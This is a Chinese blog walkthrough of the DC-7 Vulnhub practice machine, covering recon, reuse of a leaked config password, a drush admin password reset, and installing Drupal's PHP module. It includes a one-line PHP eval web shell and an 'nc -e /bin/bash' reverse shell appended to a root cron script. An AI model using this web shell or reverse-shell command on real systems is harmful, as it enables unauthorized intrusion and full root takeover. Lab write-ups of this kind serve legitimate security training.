DC-7靶机

最新推荐文章于 2024-11-11 16:00:21 发布
最新推荐文章于 2024-11-11 16:00:21 发布
阅读量46 收藏
点赞数
分类专栏: DC靶机系列 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132393075
版权

查找靶机iP

arp-scan -l

image-20230809214255154

靶机:192.168.149.146
主机:192.168.149.129

查看端口

nmap -sS -A 192.168.149.146 -p-

image-20230809214608478

登录网站

image-20230810195915662

发现没有什么信息,去作者的博客上查看,发现有配置文件

image-20230810200701823

image-20230810200721675

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

可以从中得到用户和密码

image-20230810201001866

无法登录,尝试ssh

image-20230810201617031

获取信息

image-20230810202656596

Subject: Cron <root@dc-7> /opt/scripts/backups.sh
查看文件backups.sh

image-20230810202847523

drush是一个shell接口,用于从云服务器命令行管理Drupal。
需要在 drupal web目录执行(/var/www/[drupal_folder_name])
使用 drup 更改密码运行命令(drush user-password admin --password="new_pass")

我们需要到/var/www/html/下进行修改密码
drush user-password admin --password="root"

image-20230810203750594

登录网站

image-20230810203949179

image-20230810204001355

发现在Content => Add content =>Basic page处似乎可以写shell。

image-20230810205003470

但发现Drupal 8不支持PHP代码,我们去百度搜索后发现Drupal 8后为了安全,需要将php单独作为一个模块导入。进入Extend => Install new module,输入php模块包的url。

image-20230810205131051

image-20230810204626355

image-20230814213052543

shell

上传木马

<?php @eval($_POST['123']) ?>

image-20230814212328511

蚁剑连接

image-20230814213158289

http://192.168.149.146/node/4

image-20230814213256942

连接成功

监听

image-20230814213342416

image-20230814213443917

image-20230814213457735

交互

image-20230814213551034

提权

使用find / -perm -u=s 2>/dev/null进行查找是否可以进行suid提权

image-20230814214149382

因为我们当前的用户为www-data所以我们可以使用之前root用户的定时任务进行提权

所以我们再次使用nc写个反弹命令进定时任务中

echo "nc -e /bin/bash 192.168.149.154 5555" >> /opt/scripts/backups.sh

image-20230814215155895

image-20230814220024208

-e /bin/bash 192.168.149.154 5555" >> /opt/scripts/backups.sh


[外链图片转存中...(img-sL0lG5AU-1692519607754)]

[外链图片转存中...(img-i0ZXy3gi-1692519607754)]

![image-20230814220128940](https://img-blog.csdnimg.cn/img_convert/7a1e6283717b303041dba2fa719967b4.png)
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-7靶机通关
qq_63831588的博客
08-01 1146
在这里我找了半天也没有找出来是有什么线索还是什么,也尝试了找一些注入点啊或者什么的,但是都不行,总之就是卡住了,然后我看了一下题解,他这个账号密码给的很莫名其妙,是在 github上面放着的!www-date 这个用户是有读写执行的权限,但是其他用户只可以读和执行这个脚本,但是没有写的权限,这也就是为什么我们上面要拿到www这个用户的shell,我们拿到以后在这个脚本里加入反弹shell的权限,然后再执行一下这个脚本,由于执行的时候是以root身份执行的,所以会反弹给我们一个root的shell!
DC-7靶机渗透详细流程
braty_的博客
02-07 1601
DC-7靶机渗透详细流程
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 891
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC-7靶机渗透测试
读书 买花 长大
04-30 395
DC-7
DC-7靶机渗透
m0_62008601的博客
06-02 1065
dc-7靶机的渗透过程
DC-7靶机进行渗透测试
zll___的博客
03-24 294
DC-7靶机进行渗透测试
dc-7 靶机渗透学习
..
03-23 4155
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
vulnhub DC-7 靶机 渗透测试
小松博客
05-28 149
我们打开这个人的界面,发现一个在GitHub上的神秘链接。映入眼帘的就是一个config.php,并且拿到了数据库的账号密码。这个drush 原来是dupal 的命令,具体可以参考这个链接内容。我们查看一下这个backups.sh文件,这个命令很奇怪。执行ls,发现有一个backup文件夹和mbox文件。跳出框框思考,我们在网页下面发现一个神秘代码。拿到shell,查看自己有哪些权限。发现没有php模块,我们自己加一个。等了好几分钟,shell终于到了。端口发现,开放80,22。登陆,进入后台模块管理。
DC-7靶机详细渗透过程
MRS_jianai的博客
12-02 301
DC-7靶机渗透教程
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
AI与隐私:Facebook如何在数据保护中平衡创新与安全
2301_78954254的博客
11-07 627
在快速发展的数字时代,人工智能(AI)技术的应用正在为社交媒体平台带来前所未有的创新。然而,伴随着技术的进步,用户的隐私保护问题也愈加凸显。作为全球最大的社交网络之一,Facebook在推动AI技术应用的同时,必须面对如何在数据保护中实现创新与安全的平衡。本文将探讨Facebook在这一领域的策略和实践。
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 1422
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
FileLink跨网文件安全摆渡系统——企业数据流转的安全桥梁
最新发布
weixin_44264342的博客
11-11 652
随着企业信息化建设的不断推进,跨网文件传输的需求日益增长,FileLink跨网文件安全摆渡系统通过全方位的安全保障与高效传输能力,成为企业解决跨网文件传输难题的理想选择。无论是对数据的加密保护、权限管理、合规审计,还是对传输效率的优化,FileLink都能够提供全面的解决方案,确保文件在内外网之间的安全、高效流转。如果您的企业正面临跨网文件传输的挑战,不妨选择FileLink,让它成为您企业数据流转的安全桥梁,助力企业信息流通的高效性和安全性,为您的业务发展保驾护航。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 382
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1210
信息安全工程师——操作系统安全概述篇
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
weixin_46641057的博客
11-09 906
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领域知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值